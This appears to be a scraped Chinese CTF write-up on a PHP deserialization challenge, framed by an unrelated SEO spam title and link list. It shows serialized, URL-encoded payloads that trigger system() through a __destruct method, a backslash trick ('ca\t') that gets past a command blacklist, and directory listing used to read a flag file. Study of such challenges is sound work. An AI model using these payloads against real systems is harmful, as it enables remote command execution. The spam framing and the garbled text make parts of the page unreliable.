当前位置: 首页 > news >正文

简述营销网站建设包括哪些内容广告优化师加班严重

简述营销网站建设包括哪些内容,广告优化师加班严重,wordpress 发布 接口,一般做网站要多少钱代码审计#xff1a; 定义了一个eval类#xff0c;该类下有一个私有变量cmd和公有成员函数destruct()#xff0c;该函数在对象的所有引用都被删除或类被销毁时会自动调用#xff1b; 调用该函数则会执行一个正则表达式进行正则匹配#xff0c;过滤掉了一些常用命令和bas… 代码审计 定义了一个eval类该类下有一个私有变量cmd和公有成员函数destruct()该函数在对象的所有引用都被删除或类被销毁时会自动调用 调用该函数则会执行一个正则表达式进行正则匹配过滤掉了一些常用命令和base编码 i表示不区分大小写因此我们无法使用大小写来绕过 如果满足if条件没有被匹配到则会调用system函数执行我们传入的cmd内容 最终要求我们使用post请求给unser传参传入后会对其进行反序列化。 关于反序列化漏洞基础知识以及PHP魔法函数、pop链构造请参考我之前的博客 http://t.csdnimg.cn/UqIXd http://t.csdnimg.cn/Crxdl http://t.csdnimg.cn/vGNgX http://t.csdnimg.cn/mdplc OK咱们继续说这道题这里考的就是php反序列化漏洞 编写序列化脚本先将原本的eval类的内容复制进来 错误示例 ?php class evil {private $cmd;public function __destruct(){if(!preg_match(/cat|tac|more|tail|base/i, $this-cmd)){system($this-cmd);}} }$e new evil(); $e-cmd ls; echo serialize($e)? 创建了一个 evil 对象并设置了 cmd 属性然后对对象进行了序列化。但要注意在 PHP 中如果一个类包含私有属性并且你尝试序列化该对象私有属性的值将不会被包括在序列化结果中。因此在反序列化时你无法访问 cmd 属性的值因为它不会被正确反序列化。 对于私有变量我们一般在类中直接对其修改 ?php class evil {private $cmdls;public function __destruct(){if(!preg_match(/cat|tac|more|tail|base/i, $this-cmd)){system($this-cmd);}} }$e new evil(); echo serialize($e)? O:4:evil:1:{s:9:evil cmd;s:2:ls;}  虽然序列化成功了但是将结果传入发现没反应 应该是我们传入的内容被进行了一次url解码 因此我们对结果再进行url编码 ?php class evil {private $cmdls;public function __destruct(){if(!preg_match(/cat|tac|more|tail|base/i, $this-cmd)){system($this-cmd);}} }$e new evil(); echo urlencode(serialize($e));? 构造payload postunserO%3A4%3A%22evil%22%3A1%3A%7Bs%3A9%3A%22%00evil%00cmd%22%3Bs%3A2%3A%22ls%22%3B%7D回显成功 构造payload进行目录穿越 ?php class evil {private $cmdls ../../../;public function __destruct(){if(!preg_match(/cat|tac|more|tail|base/i, $this-cmd)){system($this-cmd);}} }$e new evil(); echo urlencode((serialize($e)))? postunserO%3A4%3A%22evil%22%3A1%3A%7Bs%3A9%3A%22%00evil%00cmd%22%3Bs%3A12%3A%22ls..%2F..%2F..%2F%22%3B%7D在根目录下找到flag  由于cattac被过滤了这里使用转义符号进行绕过 ?php class evil {private $cmdca\t /th1s_1s_fffflllll4444aaaggggg;public function __destruct(){if(!preg_match(/cat|tac|more|tail|base/i, $this-cmd)){system($this-cmd);}} }$e new evil(); echo urlencode((serialize($e)))? 构造payload postunserO%3A4%3A%22evil%22%3A1%3A%7Bs%3A9%3A%22%00evil%00cmd%22%3Bs%3A35%3A%22ca%5Ct%2Fth1s_1s_fffflllll4444aaaggggg%22%3B%7Dflag{1f321f7f-2a47-421e-839b-bb899cb523b0}
http://www.hkea.cn/news/14371369/

相关文章:

  • 石家庄建站模板厂家自贡市工程造价信息网
  • 专门做卫生间效果图的网站搜索引擎网站推广如何优化
  • 上海的建设网站制作西安建网站公司
  • 景泰做网站动漫网页设计模板素材
  • 淄博高端网站下载软件推广
  • 小型企业的网站建设论文青岛做网站定制
  • 定制网站开发价格汕头做网站
  • 专业网站定制平台网站开发报价 知乎
  • 山西城乡建设学校报名网站外贸公司建网站一般多少钱
  • 优秀学校网站模板网站模板是怎么制作
  • 宁夏网站建设一条龙一个服务器可以建几个网站
  • 网站网页制作公司1+x网店运营推广
  • wordpress 模板森林安卓优化清理大师
  • 网站建设总体上可划分为两个阶段高档网站建
  • 建立公司网站流程品牌设计策划
  • 扬州有什么做网站的公司网站平台设计费用
  • 北京上地网站建设wordpress扒站工具
  • 郑州新密网站建设建网站学什么
  • 360购物网站怎么做的网络营销常用的方法包括
  • 制作网站网络科技公司做淘宝可以在别的网站发信息吗
  • 阿里巴巴网站广告怎么做node有类似Wordpress
  • 查询备案网站百度搜索推广多少钱
  • 人工做流量的网站电子商务网站体系结构有哪些
  • 做名片模板网站工商查询系统
  • 做网站全包网站高质量链群怎么做
  • 做毕业网站的周记做网站硬件工程是什么
  • 做百度推广首先要做网站吗佛山建站
  • 苏州市市政建设管理处网站31省本土新增今天
  • 如何注册一个免费域名长沙seo排名扣费
  • 景点旅游网站开发与设计无锡网站建设专业极速信息